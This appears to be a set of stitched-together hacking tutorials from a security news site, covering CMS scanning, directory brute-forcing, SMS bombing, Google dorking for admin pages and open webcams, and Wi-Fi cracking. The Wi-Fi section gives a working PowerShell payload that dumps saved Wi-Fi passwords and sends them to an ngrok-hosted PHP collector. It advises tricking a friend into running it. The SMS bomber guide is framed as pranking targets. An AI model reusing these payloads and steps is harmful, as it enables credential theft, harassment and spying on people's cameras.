 remote: Enumerating objects: 35, done.
 remote: Counting objects: 100% (35/35), done.
 remote: Compressing objects: 100% (28/28), done.
 remote: Total 1034 (delta 13), reused 17 (delta 7), pack-reused 999
 Receiving objects: 100% (1034/1034), 505.30 KiB | 410.00 KiB/s, done.
 Resolving deltas: 100% (609/609), done.

• Type cd vulnx/
• Type ls

root@kali:/home/iicybersecurity/Downloads# cd vulnx/
root@kali:/home/iicybersecurity/Downloads/vulnx# ls
 CHANGELOG.md  common  docker      LICENSE  README.md         shell      vulnx.py
 cli.py        config  install.sh  modules  requirements.txt  update.sh

• Type ./install.sh

root@kali:/home/iicybersecurity/Downloads/vulnx# ./install.sh

===== VULNX INSTALL =====
 [+] Vulnx Will Be Installed In Your System
 [+] Installing python3...
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3 is already the newest version (3.7.3-1).
0 upgraded, 0 newly installed, 0 to remove and 664 not upgraded.
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r ./requirements.txt (line 1)) (2.21.0)
Collecting bs4 (from -r ./requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz
Requirement already satisfied: beautifulsoup4 in /usr/lib/python2.7/dist-packages (from bs4->-r ./requirements.txt (line 2)) (4.8.0)
Building wheels for collected packages: bs4
  Running setup.py bdist_wheel for bs4 ... done
  Stored in directory: /root/.cache/pip/wheels/a0/b0/b2/4f80b9456b87abedbc0bf2d52235414c3467d8889be38dd472
Successfully built bs4
Installing collected packages: bs4
Successfully installed bs4-0.0.1
 [+] Checking directories...
 [+] Installing ...
 [+] Creating Symbolic Link ...
 [+] Tool Successfully Installed And Will Start In 5s!
 [+] You can execute tool by typing vulnx



                    .:.        .:,
                   xM;           XK.
                  dx'            .lO.
                 do                ,0.
             .c.lN'      ,  '.     .k0.:'
              xMMk;d;''cOM0kWXl,',locMMX.
              .NMK.   :WMMMMMMMx    dMMc
               lMMO  lWMMMMMMMMMO. lMMO
                cWMxxMMMMMMMMMMMMKlWMk
                 .xWMMMMMMMMMMMMMMM0,
                   .,OMd,,,;0MMMO,.
             .l0O.VXVXOX.VXVX0MOVXVX.0Kd,
            lWMMO0VXVX0OX.VXVXlVXVX.VXNMMO
           .MMX;.N0VXVX00X.VXVXVX0.0M:.OMMl
          .OXc  ,MMOVXVX0VX .VXVX00MMo  ,0X'
          0x.  :XMMMkVXVX.XO.VXVXdMMMWo.  :X'
         .d  'NMMMMMMkVXVX..VXVX0.XMMMMWl  ;c
            'NNoMMMMMMxVXVXVXVXVX0.XMMk0Mc
           .NMx OMMMMMMdVXVXVXlVXVX.NW.;MMc
          :NMMd .NMMMMMMdVXVXdMd,,,,oc ;MMWx
          .0MN,  'XMMMMMMoVXoMMMMMMWl   0MW,
           .0.    .xWMMMMM:lMMMMMM0,     kc
            ,O.     .:dOKXXXNKOxc.      do
             '0c        -VulnX-       ,Ol
               ;.                     :.

    # Coded By Anouar Ben Saad - @anouarbensaad

• Type chmod 755 requirements.txt vulnx.py

root@kali:/home/iicybersecurity/Downloads/vulnx# chmod 755 requiremnets.txt vulnx.py

• Type python3 vulnx.py –help

root@kali:/home/iicybersecurity/Downloads/vulnx# python3 vulnx.py --help

                    .:.        .:,
                   xM;           XK.
                  dx'            .lO.
                 do                ,0.
             .c.lN'      ,  '.     .k0.:'
              xMMk;d;''cOM0kWXl,',locMMX.
              .NMK.   :WMMMMMMMx    dMMc
               lMMO  lWMMMMMMMMMO. lMMO
                cWMxxMMMMMMMMMMMMKlWMk
                 .xWMMMMMMMMMMMMMMM0,
                   .,OMd,,,;0MMMO,.
             .l0O.VXVXOX.VXVX0MOVXVX.0Kd,
            lWMMO0VXVX0OX.VXVXlVXVX.VXNMMO
           .MMX;.N0VXVX00X.VXVXVX0.0M:.OMMl
          .OXc  ,MMOVXVX0VX .VXVX00MMo  ,0X'
          0x.  :XMMMkVXVX.XO.VXVXdMMMWo.  :X'
         .d  'NMMMMMMkVXVX..VXVX0.XMMMMWl  ;c
            'NNoMMMMMMxVXVXVXVXVX0.XMMk0Mc
           .NMx OMMMMMMdVXVXVXlVXVX.NW.;MMc
          :NMMd .NMMMMMMdVXVXdMd,,,,oc ;MMWx
          .0MN,  'XMMMMMMoVXoMMMMMMWl   0MW,
           .0.    .xWMMMMM:lMMMMMM0,     kc
            ,O.     .:dOKXXXNKOxc.      do
             '0c        -VulnX-       ,Ol
               ;.                     :.

    # Coded By Anouar Ben Saad - @anouarbensaad

usage: vulnx.py [-h] [-u URL] [-D DORKS] [-o OUTPUT] [-t TIMEOUT]
                [-c {user,themes,version,plugins,all}] [--threads NUMTHREAD]
                [-n NUMBERPAGE] [-i INPUT_FILE]
                [-l {wordpress,prestashop,joomla,lokomedia,drupal,all}]
                [-p SCANPORTS] [-e] [--it] [-w] [-d] [--dns]

OPTIONS:
  -h, --help            show this help message and exit
  -u URL, --url URL     url target to scan
  -D DORKS, --dorks DORKS
                        search webs with dorks
  -o OUTPUT, --output OUTPUT
                        specify output directory
  -t TIMEOUT, --timeout TIMEOUT
                        http requests timeout
  -c {user,themes,version,plugins,all}, --cms-info {user,themes,version,plugins,all}
                        search cms info[themes,plugins,user,version..]
  --threads NUMTHREAD   number of threads
  -n NUMBERPAGE, --number-pages NUMBERPAGE
                        search dorks number page limit
  -i INPUT_FILE, --input INPUT_FILE
                        specify input file of domains to scan
  -l {wordpress,prestashop,joomla,lokomedia,drupal,all}, --dork-list {wordpress,prestashop,joomla,lokomedia,drupal,all}
                        list names of dorks exploits
  -p SCANPORTS, --ports SCANPORTS
                        ports to scan
  -e, --exploit         searching vulnerability & run exploits
  --it                  interactive mode.
  -w, --web-info        web informations gathering
  -d, --domain-info     subdomains informations gathering
  --dns                 dns informations gatherings

• Type python3 vulnx.py -u http://hack.me –dns -d -w -e –output ./hack.me
• –dns is used to gather dns information.
• -d is used to gather domain info.
• -w is used to gather web domain info.
• -e is used to search for vulnerabilities & exploits.

root@kali:/home/iicybersecurity/Downloads/vulnx# python3 vulnx.py -u http://hack.me --dns -d -w -e --output ./hack.me

                   .:.        .:,
                   xM;           XK.
                  dx'            .lO.
                 do                ,0.
             .c.lN'      ,  '.     .k0.:'
              xMMk;d;''cOM0kWXl,',locMMX.
              .NMK.   :WMMMMMMMx    dMMc
               lMMO  lWMMMMMMMMMO. lMMO
                cWMxxMMMMMMMMMMMMKlWMk
                 .xWMMMMMMMMMMMMMMM0,
                   .,OMd,,,;0MMMO,.
             .l0O.VXVXOX.VXVX0MOVXVX.0Kd,
            lWMMO0VXVX0OX.VXVXlVXVX.VXNMMO
           .MMX;.N0VXVX00X.VXVXVX0.0M:.OMMl
          .OXc  ,MMOVXVX0VX .VXVX00MMo  ,0X'
          0x.  :XMMMkVXVX.XO.VXVXdMMMWo.  :X'
         .d  'NMMMMMMkVXVX..VXVX0.XMMMMWl  ;c
            'NNoMMMMMMxVXVXVXVXVX0.XMMk0Mc
           .NMx OMMMMMMdVXVXVXlVXVX.NW.;MMc
          :NMMd .NMMMMMMdVXVXdMd,,,,oc ;MMWx
          .0MN,  'XMMMMMMoVXoMMMMMMWl   0MW,
           .0.    .xWMMMMM:lMMMMMM0,     kc
            ,O.     .:dOKXXXNKOxc.      do
             '0c        -VulnX-       ,Ol
               ;.                     :.

    # Coded By Anouar Ben Saad - @anouarbensaad


 [Target] => http://hack.me

------------------------------------------------
 [?] looking for cms
 [+] CMS : Lokomedia
------------------------------------------------
------------------------------------------------
 [~] Scanning Ports

   PORTS                     STATUS  PROTO
 [?] 22                    CLOSE   SSH
-----------------------------------------------
 [~] Starting DNS dump
 [!] Retrieved token: 7lMSlFeGREkQtU4PxAkC9E7JuA0wsfXnLpLxG3izLIboqqtCEBFGs2YDRCIMsJLh
 [?] Search for DNS Servers
 [+] Host : ns-113.awsdns-14.com.
 [+] IP : 205.251.192.113
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-1428.awsdns-50.org.
 [+] IP : 205.251.197.148
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-1869.awsdns-41.co.uk.
 [+] IP : 205.251.199.77
 [+] AS : AMAZON-02
  ----------------
 [+] Host : ns-881.awsdns-46.net.
 [+] IP : 205.251.195.113
 [+] AS : AMAZON-02
  ----------------
 [?] Search for MX Records
 [+] Host : 1 aspmx.l.google.com.
 [+] IP : 172.217.197.27
 [+] AS : GOOGLE
  ----------------
 [+] Host : 10 alt3.aspmx.l.google.com.
 [+] IP : 64.233.184.27
 [+] AS : GOOGLE
  ----------------
 [+] Host : 10 alt4.aspmx.l.google.com.
 [+] IP : 172.217.218.26
 [+] AS : GOOGLE
  ----------------
 [+] Host : 5 alt1.aspmx.l.google.com.
 [+] IP : 64.233.186.26
 [+] AS : GOOGLE
  ----------------
 [+] Host : 5 alt2.aspmx.l.google.com.
 [+] IP : 209.85.202.26
 [+] AS : GOOGLE
  ----------------
-----------------------------------------------
 [~] Check Vulnerability

• Above shows the CMS of the target URL. Then vulnx has scanned for opened ports & it has also retrieved token associated with DNS.
• Then it has retrieved DNS servers with their respective IP addresses & hosts. Such basic information can also be retrieved with nslookup.
• But here vulnx makes an automation for finding all the DNS servers.
• You can scan websites for different CMS in a similar way.

The post How to find Vulnerabilities in CMS Websites appeared first on Information Security Newspaper | Hacking News.

• For testing we are using Kali Linux 2019.1 amd64. Open terminal type
  • sudo apt-get update
  • sudo apt-get install gobuster
• After installation type gobuster

root@kali:/home/iicybersecurity/Downloads# gobuster
 Usage:
   gobuster [command]
 Available Commands:
   dir         Uses directory/file brutceforcing mode
   dns         Uses DNS subdomain bruteforcing mode
   help        Help about any command
   vhost       Uses VHOST bruteforcing mode
 Flags:
   -h, --help              help for gobuster
   -z, --noprogress        Don't display progress
   -o, --output string     Output file to write results to (defaults to stdout)
   -q, --quiet             Don't print the banner and other noise
   -t, --threads int       Number of concurrent threads (default 10)
   -v, --verbose           Verbose output (errors)
   -w, --wordlist string   Path to the wordlist

Finding Files/ Directories

• On Target side we will be using DVWA (Dam Vulnerable Web Application). Download from https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/
• Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
• -u is used to assign target URL, 192.168.1.105 is our target/DVWA.
• -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.

root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Timeout:        10s
 2019/11/01 01:20:19 Starting gobuster
 /.hta (Status: 403)
 /.svn (Status: 301)
 /.htpasswd (Status: 403)
 /.svn/entries (Status: 200)
 /.htaccess (Status: 403)
 /css (Status: 301)
 /images (Status: 301)
 /includes (Status: 301)
 /js (Status: 301)
 2019/11/01 01:20:25 Finished

• Above query has scanned all the files & directories on the target URL.

Printing Files With Full Path

• Type gobuster dir -e -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
• -e is used to print full path of the files.
• -u is used to assign target URL 192.168.1.105 is our target.
• -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.

root@kali:/home/iicybersecurity# gobuster dir -e -u  http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Expanded:       true
 [+] Timeout:        10s
 2019/11/01 01:21:34 Starting gobuster
 http://192.168.1.105/dvwa/.hta (Status: 403)
 http://192.168.1.105/dvwa/.htpasswd (Status: 403)
 http://192.168.1.105/dvwa/.svn (Status: 301)
 http://192.168.1.105/dvwa/.htaccess (Status: 403)
 http://192.168.1.105/dvwa/.svn/entries (Status: 200)
 http://192.168.1.105/dvwa/css (Status: 301)
 http://192.168.1.105/dvwa/images (Status: 301)
 http://192.168.1.105/dvwa/includes (Status: 301)
 http://192.168.1.105/dvwa/js (Status: 301)
 2019/11/01 01:21:39 Finished

• Above you can find the full path of the target URL. This query can help to prepare for the initial level of information gathering.

Printing Output Using Verbose

• Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -v
• -u is used to assign target URL. 192.168.1.105 is our target.
• -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
• -v is used for verbose mode.

root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -v
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Verbose:        true
 [+] Timeout:        10s
 2019/11/01 01:33:32 Starting gobuster
 Missed: /.bashrc (Status: 404)
 Missed: /.cvs (Status: 404)
 Missed: /.cvsignore (Status: 404)
 Missed: /.forward (Status: 404)
 Missed: /.config (Status: 404)
 Missed: /.git/HEAD (Status: 404)
 Missed: /.cache (Status: 404)
 Found: /.hta (Status: 403)
 Missed: /.profile (Status: 404)
 Missed: /.history (Status: 404)
 Missed: /.mysql_history (Status: 404)
 Missed: /.passwd (Status: 404)
 Missed: /.listings (Status: 404)
 Missed: /.perf (Status: 404)
 Missed: /.sh_history (Status: 404)
 Found: /.htpasswd (Status: 403)
 Missed: /.listing (Status: 404)
 Missed: /.rhosts (Status: 404)
 Found: /.svn/entries (Status: 200)
 Missed: /.subversion (Status: 404)
 Missed: /.ssh (Status: 404)
 Missed: /.web (Status: 404)
 Missed: /archive (Status: 404) Found: /.svn (Status: 301) Missed: /@ (Status: 404) Missed: /.swf (Status: 404) Found: /.htaccess (Status: 403) Missed: /_backup (Status: 404) Missed: /.bash_history (Status: 404) Missed: /_adm (Status: 404) Missed: /_borders (Status: 404) Missed: /_cache (Status: 404) Missed: /_admin (Status: 404) Missed: /_baks (Status: 404) Missed: /_catalogs (Status: 404) Missed: /_code (Status: 404) Missed: /_assets (Status: 404) Missed: /_common (Status: 404) Missed: /_conf (Status: 404) Missed: /_ajax (Status: 404) Missed: / (Status: 404)
 Missed: /_files (Status: 404)
 Missed: /_css (Status: 404)
 Missed: /_data (Status: 404)
 Missed: /_database (Status: 404)
 Missed: /_db_backups (Status: 404)
 Missed: /_derived (Status: 404)
 Missed: /_dev (Status: 404)
 Missed: /_config (Status: 404)
 Missed: /_flash (Status: 404)
 Missed: /_dummy (Status: 404)
 Missed: /_inc (Status: 404)
 Missed: /_fpclass (Status: 404)
 Missed: /_includes (Status: 404)
 Missed: /_install (Status: 404)
 Missed: /_images (Status: 404)
 Missed: /_js (Status: 404)
 Missed: /_layouts (Status: 404)
 Missed: /_img (Status: 404)
 Missed: /_lib (Status: 404)
 Missed: /_media (Status: 404)
 Missed: /_mm (Status: 404)
 Missed: /_mygallery (Status: 404)

• Above query has try to find files in verbose mode. Showing HTTP status code on each request.

Printing Files with No Status

• Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -n
• -u is used to assign target URL. 192.168.1.105 is our target URL.
• -w is used to assign wordlist. /usr/share/wordlists/dirb/common.txt is the wordlist location.
• -n is used to print with no status codes.

root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -n
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] No status:      true
 [+] Timeout:        10s
 2019/11/01 02:36:35 Starting gobuster
 /.hta
 /.htpasswd
 /.svn
 /.svn/entries
 /.htaccess
 /css
 /images
 /includes
 /js
 2019/11/01 02:36:38 Finished

• Above query has printed with data without any status codes.

Finding Length of the Response Files

• Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -l
• -u is used to assign target URL. 192.168.1.105 is our target URL.
• -w is used to assign wordlist location. -w /usr/share/wordlists/dirb/common.txt is our wordlist location.
• -l is used find length of response files.

root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -l
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Show length:    true
 [+] Timeout:        10s
 2019/11/01 02:57:45 Starting gobuster
 /.hta (Status: 403) [Size: 1108]
 /.htpasswd (Status: 403) [Size: 1108]
 /.svn/entries (Status: 200) [Size: 256]
 /.htaccess (Status: 403) [Size: 1108]
 /.svn (Status: 301) [Size: 416]
 /css (Status: 301) [Size: 415]
 /images (Status: 301) [Size: 418]
 /includes (Status: 301) [Size: 420]
 /js (Status: 301) [Size: 414]
 2019/11/01 02:57:48 Finished

• Above shows the files size. By this attacker can obtain type of files target uses to maintain their website and as per digital forensics expert of International Institute of Cyber Security file size is also one of the parameters in analyzing the malware.

Finding Files With Specific Extension

• Type gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -x .php
• -u is used to assign URL. 192.168.1.105 is our target URL
• -w is used to assign wordlist. -w /usr/share/wordlists/dirb/common.txt is wordlist location.
• -x is used to extract specific extension files. .php will be extracted.

root@kali:/home/iicybersecurity# gobuster dir -u http://192.168.1.105/dvwa -w /usr/share/wordlists/dirb/common.txt -x .php
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://192.168.1.105/dvwa
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Extensions:     php
 [+] Timeout:        10s
 2019/11/01 03:32:20 Starting gobuster
 /.hta (Status: 403)
 /.hta.php (Status: 403)
 /.htpasswd (Status: 403)
 /.htpasswd.php (Status: 403)
 /.htaccess (Status: 403)
 /.htaccess.php (Status: 403)
 /.svn/entries (Status: 200)
 /.svn (Status: 301)
 /css (Status: 301)
 /images (Status: 301)
 /includes (Status: 301)
 /js (Status: 301)
 2019/11/01 03:32:25 Finished

• Above query has found files with .php extension. This query can help attacker to create malicious files on specific extension.

Finding Username & Password

• Type gobuster dir -u http://testphp.vulnweb.com/login.php -w /usr/share/wordlists/dirb/common.txt -U test -P test
• -u is used to assign URL. 192.168.1.105 is our target URL
• -w is used to assign wordlist. -w /usr/share/wordlists/dirb/common.txt is wordlist location.
• -U is for username & -P is for password.

root@kali:/home/iicybersecurity# gobuster dir  -u http://testphp.vulnweb.com/login.php -w /usr/share/wordlists/dirb/common.txt -U test -P test
 Gobuster v3.0.1
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
 [+] Url:            http://testphp.vulnweb.com/login.php
 [+] Threads:        10
 [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
 [+] Status codes:   200,204,301,302,307,401,403
 [+] User Agent:     gobuster/3.0.1
 [+] Auth User:      test
 [+] Timeout:        10s
 2019/11/01 04:31:34 Starting gobuster
 /admin.php (Status: 200)
 /index.php (Status: 200)
 /info.php (Status: 200)
 /phpinfo.php (Status: 200)
 /xmlrpc.php (Status: 200)
 /xmlrpc_server.php (Status: 200)
 2019/11/01 04:32:54 Finished

• Above query has returned with address of 200 which means that username & password has matched.

The post Bruteforce Any Website With GoBuster, Step-By-Step Guide appeared first on Information Security Newspaper | Hacking News.

We will use Userland applications which allows to install Kali Linux on android devices without rooting. Aircrack-ng will not work in Userland as it required device root access.

So here we will start php server on hacker mobile & ngrok is used for forwarding. And will create an payload to execute in VICTIM Windows OS.

ON HACKER MOBILE

• For testing we will use Xiaomi Redmi Note 4. You have install
  • UserLand – https://play.google.com/store/apps/details?id=tech.ula&hl=en_IN
  • ConnectBot – https://play.google.com/store/apps/details?id=org.connectbot&hl=en_IN
• These applications will be used to gather Wifi Password.
• As per the ethical hacking researcher of International Institute of Cyber Security, Userland will allow us to install different Linux distros on mobile. So here we will install Kali Linux & connect it will ConnectBot.
• Click on Kali Linux enter password iicybersecurity@12345. You can write any password.

• Type su && sudo apt-get update && sudo apt-get install net-tools
• Type sudo apt-get install unzip && apt-mark build apache*

• Then type sudo apt-get install php && sudo apt-get install screen

• Type screen then again type screen

• Type mkdir phpServer && type cd phpServer
• Type nano index.php and this below code.

<html>
 <title> PHP Server </title>
  <body>
  <h1> It works!</h1>
  <?php
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));
  ?>
  </body>
</html>

• Type php -S 0.0.0.0:80 &
• Type ps -ef to check whether php is running or not.

• Go to https://dashboard.ngrok.com/signup create a new account. After then login through your account. Go to Auth & copy the auth token.

• Type sudo apt-get install wget && type wget https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
• Now type unzip ngrok-2.2.8-linux-arm64.zip, this will extract ngrok file in the same directory.

• Type ./ngrok authtoken <Your authtoken>

• Type screen
• Then type ./ngrok http 80
• Now to run this ngrok in background press key combination of Ctrl+a+n, this will move the ngrok command in background and return to the shell prompt.
• According of the ethical hacking researcher of International Institute of Cyber Security this key combination can change on the mobile model.

• Save the below code in .bat extension. For that you can use WPS office application for saving the bat file. Download the WPS office application : https://play.google.com/store/apps/details?id=cn.wps.moffice_eng&hl=en
• Open application Click on + & then click on Document. Paste the below code in WPS office document editor. Save the file in payload.txt
• Open file manager. rename file to payload.txt to payload.bat

Add-Type -AssemblyName System.Web;

$ngrokServer = "https://SUBDOMAIN.ngrok.io/index.php";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $oXml.Load($path);
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}

}

Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;

• Now you make any social engineering trick to send this payload to your friend. Once your friend open the payload in Windows computer (VICTIM machine). Above code is powershell code which when run in powershell will extract all password in VICTIM system.
• As commented by digital forensics expert of International Institute of Cyber Security, came code is used in some malware with powershell to get all passwords of the VICTIM system

• You will get all the stored Wifi passwords to your android device.

• Above you can see all stored passwords of Wifi in /home/iicybersecurity/phpServer/ directory.
• For more information on others ways to hack wifi passwords please follow this youtube link.

The post Hack Wifi Without Rooting Android Devices appeared first on Information Security Newspaper | Hacking News.

Fake text or fake SMS or fake message are the biggest threat industry is facing. All applications require an account to keep your settings, app usage. While registering through applications, they generally require mobile number for registering & returns with OTP (One Time Password). You might encounter many times you receive unnecessary OTPs from different recipients. Many times attacks/ spammers uses SMS bombing techniques to irritate or disturb their targets.

SMS bombing is a technique of sending fake messages on any mobile number. SMS bombing uses an script containing SMS Gateway APIs. It uses SMS APIs of different SMS gateways. According to ethical hacking researcher of international institute of cyber security SMS bombers utilizes different gateways. SMS gateway providers gives services of forwarding, routing & storing incoming messages. For sending messages using SMS gateway connect with SMSC centers.

Some popular SMS Gateways are :-

• You can also check free APIs & you can use in creating sms bomber scripts. Go to : https://rapidapi.com/
• Nexmo SMS Messaging
• Twillo SMS
• TeleSign
• D7SMS
• Telnyx
• MessageBird
• Click Send (IntelTech)

SMS Bomber Application :-

• There are different tools which are used in SMS bombing. BombitUP is an application used in SMS bombing.
• Download application : https://www.bombitup.net/
• Download & install BOMBitUP_v4.03.1.apk
• Enter target mobile number & then enter no. of count messages you want to send.
• Click on BOMBIT

• You can also setup delays in no. of seconds. By default is 2.5 second.

• It depends on the bombit server. But most of times messages are sent on time.
• Click on Bombit

• Above screenshot shows that 10 messages has been sent. Below shows received messages.

• Above you can see received messages on the target number.

You can checkout the SMS Bomber practical :-

As per the ethical hacking researcher of International Institute of Cyber Security there are many more ways to send fake SMS or fake messages to do social engineering attacks

The post Fake text message attack. How Prank or hack your Friends with fake SMS Bomber appeared first on Information Security Newspaper | Hacking News.

How Does Google Dorks Work :-

[Cache]:

• You must have aware that whenever you visit any website. Website is saved in google cache. Using [Cache] keyword Google will show its cache web pages.
• Type cache:securitynewspaper.com

• You can also use below options for opening the cache for any website.

• Clicking on the cache link will show the above URL with cache information.
• If you detect any web application firewall, you can used this techniques to open blocked website and view contents.

[inurl]:

• This query will search for keyword in URL. Type inurl:admin login

• Above screen shows admin login in every URL.
• This query can be used to get admin pages of any website

[Link]:

• This query will show the result URLs that have URLs pointing towards hackthissite.org
• Type link:www.hackthissite.org

• Above shows the result of hackthissite.org.

[Info]:

• This query will show information about the URL which Google have on the web.
• Type info:www.slavehack2.com

• Above screenshot shows the info about slavehack2.com.

[Related]:

• This query shows the URLs which are similar to specified URL. Below you can see specified URL with same web page.
• Type related:testphp:Vulnweb.com

• Above screenshot shows the same websites related to testphp:Vulnweb.com

[define]:

• This query will show the definition of the word/ query you have searched for.
• Type define:cyber security

• Above query shows the definition of particular keyword we have searched for.

[stocks]:

• For knowing the stocks of any company enter stocks:GOOG Remember to enter company ticker symbols not the company name.

• Above you can see the google stocks.

[site]:

• This query will find all the pages of target website. For ex – site:hackthissite.org will show all the available pages in search results.

• Above you can refer that all URLs are showing of hackthisisite.org

[allintiitle]:

• This query will show search results of all words from the title allintitle. Type allintitle:google hack

• Above screenshot shows results of allintitle mentioning google hack.

[intitle]:

• This query will show search only first word. For ex- if you type intitle:google hack. It will show result with google in title & hack inside the URL if available.

• Above query uses google as first priority. If you want to find complete word. Use the above google dork.

[allinurl]:

• This query will search for all the keywords entered in URL. Type allinurl:certifiedhacker
• This will find certifiedhacker in URLs.

• Above screenshot shows certifiedhacker in URLs. It might show some of them in title but query will only work with URL.

More Examples Using Google Dorks :-

inurl:admin login <query>

• Type inurl:admin login query. For security reasons we have hide the query name shown below.
• This query will show admin logins of written names. Here we have used country name. You can use any query for finding admin logins.

• Opening the links shows the admin logins. From here you can use another methods of bypassing the logins. Such admin logins should not be opened for public. As brute force attacks could be done or sql injection attacks can used to bypass such logins.

• Above screenshots are admin login of query we have used. Using some another queries.
• Type inurl:admin login.jsp This query will show all admin pages which developed with jsp. Exposing backend language can also be in information gathering phases.

[inurl:/view.shtml]:

• Type inurl:/view.shtml for watching live cams. This query will show web cams which are left with poor security measures. Or such cams are not configured properly.

• Above shows the link of open live cams. For ex – below you can see open live cams.

• You can use some another google dorks for finding open cams.

inurl:/view.shtml
inurl view index.shtml
inurl view index.shtml near me
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:view/index.shtml
inurl:view/view.shtml
intitle:”live view” intitle:axis
intitle:liveapplet
intitle:liveapplet inurl:LvAppl
inurl view index.shtml near my location
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis

• Above dorks can be used for finding open cams.
• On of the ethical hacking researcher of International Institute of Cyber Security was able to find the secure facility using this approach.

[inurl:admin filetype:<filetype>]:

• For finding unprotected files of any type can be found online. Type inurl:admin filetype:xls will find the excel files.
• Changing file type will display another files.

• Above shows excel & word files. You can download such files.

The post Hack Website Using Google Hacking or google Dorking – Part I appeared first on Information Security Newspaper | Hacking News.

4-Way Handshake :-

Four-way handshake is created so wireless client & access point can independently know PSK. Instead of telling the keys to each other they can transfer message in encryption from to each other. Four-way handshake is critical for protecting the PSK from infected access points. The four-way handshake is used to generate Pairwise Transient Key PTK keys.

PMKID :-

PMKID is an unique identification used by Access Point to track down PMK which is being used for client. using this method attacker will directly communicate with the vulnerable access point, rather than capturing communication between Access point and clients.

Earlier also ethical hacking researcher of International institute of cyber security has demonstrated hack any wireless network.

Configure Your Wireless Interface :-

• For configuring Wireless interface. Connect your Wireless interface with Linux. Open terminal type iwconfig to check if the wireless interface is connected. Type airmon-ng check wlan0
• Type airmon-ng start wlano
• Type iwconfig to check if the wireless interface has started in monitor mode.

root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig
 eth0      no wireless extensions.
 lo        no wireless extensions.
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off

Downloading & Installation of Wifibroot :-

• We will show how to crack four way handshake. For testing we will use Kali Linux 2019.1 amd64.
• Make sure python3 is installed. For that type sudo apt-get update && sudo apt-get install python3 Then type sudo apt-get install python3-pip
